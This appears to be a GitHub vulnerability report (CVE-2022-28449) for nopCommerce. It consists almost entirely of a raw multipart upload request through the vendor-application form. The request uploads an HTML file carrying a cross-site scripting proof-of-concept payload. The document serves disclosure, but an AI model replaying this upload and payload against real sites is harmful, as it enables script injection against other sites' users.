CVE-2022-28449: Unrestricted File Upload in Apply for vendor account feature · Issue #6192 · nopSolutions/nopCommerce

-----------------------------353170076619137176562598160618
Content-Disposition: form-data; name="Name"

pentester
-----------------------------353170076619137176562598160618
Content-Disposition: form-data; name="Email"

[email protected]
-----------------------------353170076619137176562598160618
Content-Disposition: form-data; name="Description"

Unrestricted File Upload in Apply for vendor account feature
-----------------------------353170076619137176562598160618
Content-Disposition: form-data; name="uploadedFile"; filename="script.html"
Content-Type: text/html

<h1>Testing upload file by TF1T<img src=x onerror=alert(document.domain)></h1>
-----------------------------353170076619137176562598160618
Content-Disposition: form-data; name="apply-vendor"


-----------------------------353170076619137176562598160618
Content-Disposition: form-data; name="__RequestVerificationToken"

CfDJ8PCrMQQMCTdOtvWnrq2WpITJLfTjickNjSm_qcSluUiK-_7c-VbzzTCok-M1duwMopvVKCMTy1GmrmTtQnch6SHfSXemzptzz2nOOP8uW4X6qGD2Z-1lPLct2WQrWDBY1qV5aGgzwe2T_2BneJo-5FzzMeW1b0o9epdkZ_hZpu-4UqN6zwTaxYTx-gFvJBoFaw
-----------------------------353170076619137176562598160618--